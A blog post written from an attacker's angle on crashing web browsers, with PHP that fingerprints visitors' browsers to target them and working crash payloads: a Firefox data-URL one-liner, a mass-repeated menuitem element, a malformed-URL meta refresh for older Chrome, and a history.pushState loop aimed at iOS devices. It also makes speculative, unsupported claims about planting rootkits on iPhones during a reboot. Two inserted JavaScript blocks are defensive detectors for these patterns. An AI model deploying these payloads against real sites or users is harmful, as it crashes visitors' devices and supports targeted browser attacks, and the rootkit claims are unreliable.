Crashing Web Browsers


If you like my work show support on my Patreon
Have you ever been surfing the internet when your browser starts to become really slow and then ends up crashing? There are many variables as to why this may have happened. If it happens frequently and you never visit sites you’re unfamiliar with, it could simply be that you have your browser configured in a way that makes it unstable. You could even have add-ons that conflict with each other, which can cause such issues.

Other times websites just have so much sloppy code, and code that conflicts with other code on the site, that it causes issues with people’s browsers. Browser crashes are common on the Internet. They are so common that hackers can rely on the fact that people who experience the issue often won’t think much of it when it happens. Of course, crashing a web browser alone won’t benefit a hacker. However, what can be done while the browser is in the middle of crashing is a different story.

For example, they could have their code inject DLLs into your browser that will redirect all your future browsing activities to them, or inject code into a DLL that will make the browser download and install programs onto your computer without you ever knowing. But injecting code into software means the software is being modified, and the signatures will have changed. Sometimes they won’t inject code into the software and will simply do something that can be equally malicious and is only temporary. They might simply make the browser download and install a stub to one of their RATs the one time you actually visit the site; then they pretty much own your system without ever modifying any programs.

But how is this done?

Different browsers are built differently, which means crashing a browser is different for each browser. The attacker needs to know what his/her target is in order to attack the browser correctly. This can be done with JavaScript or PHP or pretty much any language. I use PHP for identifying browsers simply because it makes it easy to collect and keep the data that has been obtained. Below is some PHP code for identifying the browser.


<?php
//Function to identify mobile devices

function isMobile()
{
return preg_match("/(android|avantgo|blackberry|bolt|boost|cricket|docomo|fone|hiptop|mini|mobi|palm|phone|pie|tablet|up\.browser|up\.link|webos|wos)/i", $_SERVER["HTTP_USER_AGENT"]);
}
// Using the function we created above
if(isMobile())
{
// Identifies the browser as Firefox on an Android device
if (strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Android')) && strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Firefox')))
{
// We put code specific to this browser here
}
// Identifies the browser is the Trident Browser on a Windows phone
else if (strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Windows Phone')) && strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Trident')))
{
// We put code here
}
// For older windows phones eg Windows CE
else if (strlen(strpos($_SERVER['HTTP_USER_AGENT'],'MSIE')) && strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Windows CE')))
{ // Yep code here
}
// This one is a bit odd because the default web browser for Android has a
// user agent that has the word Safari in it. But it is not the Apple Safari browser.
else if (strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Android')) && strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Safari')))
{
// Our code here
}
// This is for the Opera Browser for Android
else if (strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Opera')) && strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Android')))
{
// code here
}
// Honestly I don't know anyone who uses Symbian OS based phones. And I
// really don't know many exploits for this system. But it still is nice to know
// if someone is using it.
else if (strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Opera')) && strlen(strpos($_SERVER['HTTP_USER_AGENT'],'SymbOS')))
{
// code here
}
// Due to the fact that Chrome for iOS and Safari both use the same rendering
// engine we need to look for other unique identifiers.
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Safari')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Version')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'iPod')))
{
// Code here
}
// The above identified Safari for iOS (its user agent carries a Version token);
// the below identifies the iOS Chrome browser (CriOS token)
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Safari')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'CriOS')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'iPod')))
{
// code here
}
// It's funny how BlackBerry for years prided itself on security but they have
// always been the most insecure mobile phone
else if(strpos($_SERVER['HTTP_USER_AGENT'],'BlackBerry') !== FALSE)
{
// Code here
}
}
// Now lets work on desktops
else
{
// Identifies Internet Exploder
if(strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Windows')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'MSIE')))
{
// code here
}
// Identifies newer browsers that ship with Windows
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Windows')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Trident')))
{
// code goes here
}
// Identifies the Windows version of Google Chrome. This check comes before the
// Safari one because Chrome's user agent also contains the word Safari.
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Windows')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Chrome')))
{
// code here
}
// Identifies the Windows version of Apple Safari
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Windows')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Safari')))
{
// Code goes here
}
// Identifies the Windows version of Firefox
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Windows')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Firefox')))
{
// Code goes here
}
// Identifies Mozilla's not so common SeaMonkey for Windows
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Windows')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'SeaMonkey')))
{
// Code here
}
// Identifies Opera for Windows
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Opera')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Windows')))
{
// code here
}
// Let's do Apple the least secure bullshit in the whole world who brags about
// how few viruses they have
// Chrome for Apple. This check comes before the Safari one because Chrome's
// user agent also contains the word Safari.
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Macintosh')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Chrome')))
{
// code here
}
// This is for their Safari browser
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Macintosh')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Safari')))
{
// code here
}
// Firefox for Apple
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Macintosh')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Firefox')))
{
// code here
}
// Opera for Apple
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Opera')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Macintosh')))
{
// code here
}
// Time for Linux this part is really fun
// Firefox for Linux
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Linux')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Firefox')))
{
// code here
}
// Chrome for Linux
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Linux')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Chrome')))
{
// code here
}
// Opera for Linux
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Opera')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Linux')))
{
// code here
}
} ?>
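
From a defender's point of view, server-side branching like this means one URL returns different script content depending on the User-Agent header, which is something a crawler or analyst can check for. The following is an added example, not code from the original post: it compares the scripts in responses to the same URL under different User-Agent values and reports what only some clients received. The response bodies, client labels and the `loadExtra()` name are constructed sample data.

```javascript
// Added example: find script content served only to some User-Agents.
// Reduce a response to what executes: external script URLs and inline script bodies.
function scriptItems(html) {
  const items = [];
  for (const m of html.matchAll(/<script\b([^>]*)>([\s\S]*?)<\/script>/gi)) {
    const src = m[1].match(/\bsrc\s*=\s*["']?([^"'\s>]+)/i);
    const body = m[2].replace(/\s+/g, ' ').trim();
    if (src) items.push(`src:${src[1]}`);
    else if (body) items.push(`inline:${body}`);
  }
  return items;
}

// responses maps a client label to the HTML returned for ONE URL when it was
// requested with that client's User-Agent. Returns { label: [items only some got] }.
function uaSpecificScripts(responses) {
  const sets = Object.entries(responses).map(([ua, html]) => [ua, new Set(scriptItems(html))]);
  const servedToAll = (item) => sets.every(([, s]) => s.has(item));
  const result = {};
  for (const [ua, s] of sets) {
    const only = [...s].filter((item) => !servedToAll(item));
    if (only.length > 0) result[ua] = only;
  }
  return result;
}

// Constructed sample responses (not captured from any real site).
const page = (extra) => `<html><head><script src="/app.js"></script>${extra}</head><body>Hi</body></html>`;
const responses = {
  'firefox-linux': page(''),
  'chrome-windows': page(''),
  'safari-ios': page('<script>\n  loadExtra();\n</script>'),
};
console.log(uaSpecificScripts(responses)); // { 'safari-ios': [ 'inline:loadExtra();' ] }
```

A difference is a lead for review rather than proof of malice, since sites also vary content by browser for compatibility reasons.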

Now that we have a way of identifying the browser we can exploit it appropriately. We simply add malicious code to the placeholder areas of the PHP code above. This can be any code. Below is some JavaScript code.

<script>// <![CDATA[
// This is a freaking scary one because it crashes Firefox with a single line of JavaScript code
location = "data:text/html,<script>location+=location+'A'.repeat(100000000);<\/script>";
// ]]></script>

As the comment in the code states, it crashes Firefox. It works with the Windows, Mac and Linux versions of Firefox. The attacker simply places the above script into the <head></head> of the site. But it doesn’t work if the Firefox user has JavaScript disabled or uses the NoScript Firefox add-on, which allows you to choose what sites to disable JavaScript on. This is why script kids use JavaScript. But creative people with malicious intentions find ways around such issues, like the example below.


<menu type="context" id="another exploit no js needed"><menuitem label="repeat this over and over'"></menuitem>

We will simply repeat the above over and over again about 10000000 times. And honestly it isn’t hard to get the code written down that many times. We simply create a shell script or a batch file with a while loop that outputs the needed text to a file. Refer to my past blogs or research basic programming to learn how to do it. It is quite simple and one of the first things you learn when programming.

It is also worth mentioning that versions of Google Chrome older than version 43 will crash simply from long malformed URLs, for example if the browser goes to a website that has a URL that looks like the following.

http://www.example.com/This is a Malformed URL you see how it has spaces and nothing filling the spaces in it and then you see how ridiculously long the url is.html

The URL above contains spaces and is really long, which throws older versions of Google Chrome off and causes them to crash. Simply putting a meta refresh tag in the site and having it redirect 0 milliseconds after it refreshes will be simple enough, and no JavaScript is required. This is why it is always recommended to have the most up-to-date software, to prevent malicious code from exploiting unpatched older programs.

Now I will show one more. This one will crash the browsers on most iDevices but does a hell of a lot more than just crash the browsers.

<script>
var total = "";
for( var i = 0; i < 100000; i++ ) {
total = total + i.toString();
history.pushState(0,0, total );
}
</script>

So the above code pretty much pushes the history of the browser back 100000 times. What it is doing is pretty much the same thing you do when you click the button on your browser to go back to the previous page you were just on. It does this 100000 times. Now obviously the chances of a person visiting 100000 pages in one browsing session in the same tab are very low, which is why the browser crashes. We could say the same for lower integers as well. However, 100000 holds an extra special power for iOS devices: 100000 overloads what the hardware can handle. And because it can’t process all the data being pushed to it, the iDevice reboots.

When any device is in the reboot phase it has its own set of very unique vulnerabilities. If we catch it just right and program our code correctly we could in theory place a rootkit on the device and then jailbreak the iDevice, set a password for it and gain full access to the iDevice. Imagine seeing your phone bill go through the roof from calls to India you never made. Yep, this could have happened because of such an attack.

Now it is important to understand that none of the code I have provided here is malicious by itself, and it can have practical uses. However, the code I do provide can be combined with other code and used in a very malicious manner.
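
For triage of a suspicious page, the four patterns shown in this post (a huge `repeat()` count, one element repeated millions of times, a zero-delay meta refresh to a long URL with spaces, and `history.pushState()` in a large loop) can be flagged statically before the page is opened in a browser. The following is an added example, not code from the original post; it generalizes across all four patterns, and the thresholds, finding names and sample page are assumptions.

```javascript
// Added example: static triage of HTML for the four crash patterns in this post.
// All thresholds are assumed values; tune them against your own traffic.
const LIMITS = { repeatCount: 1e6, loopBound: 10000, urlLength: 2000, sameTag: 10000 };

function triageHtml(html, limits = LIMITS) {
  const findings = [];
  // 1. String.prototype.repeat() called with a very large literal count.
  for (const m of html.matchAll(/\.repeat\(\s*(\d+)\s*\)/g)) {
    if (Number(m[1]) >= limits.repeatCount) findings.push('huge-repeat');
  }
  // 2. A script that calls history.pushState() and has a loop with a large literal bound.
  for (const s of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    const loop = s[1].match(/\b(?:for|while)\s*\([^)]*?<=?\s*(\d+)/);
    if (loop && Number(loop[1]) >= limits.loopBound && /history\.pushState\s*\(/.test(s[1])) {
      findings.push('pushstate-loop');
    }
  }
  // 3. Zero-delay meta refresh to a URL with raw spaces or excessive length.
  //    Assumes http-equiv appears before content and the content value is quoted.
  const meta = /<meta\b[^>]*http-equiv\s*=\s*["']?refresh["']?[^>]*content\s*=\s*(["'])\s*(\d+)\s*;\s*url\s*=\s*(.*?)\1/gi;
  for (const m of html.matchAll(meta)) {
    const url = m[3].trim();
    if (Number(m[2]) === 0 && (/\s/.test(url) || url.length > limits.urlLength)) {
      findings.push('malformed-refresh');
    }
  }
  // 4. One element name repeated far more often than a hand-written page would.
  const counts = new Map();
  for (const m of html.matchAll(/<([a-z][a-z0-9]*)\b/gi)) {
    const tag = m[1].toLowerCase();
    counts.set(tag, (counts.get(tag) || 0) + 1);
  }
  for (const [tag, n] of counts) {
    if (n >= limits.sameTag) findings.push(`repeated-element:${tag}`);
  }
  return findings;
}

// Constructed sample: the pushState loop from this post inside a minimal page.
const sample = '<html><script>var t="";for(var i=0;i<100000;i++){t+=i;history.pushState(0,0,t);}</script></html>';
console.log(triageHtml(sample)); // [ 'pushstate-loop' ]
```

These are literal-value heuristics, so a page that computes its counts at run time will not be flagged; treat a clean result as "nothing obvious", not as safe.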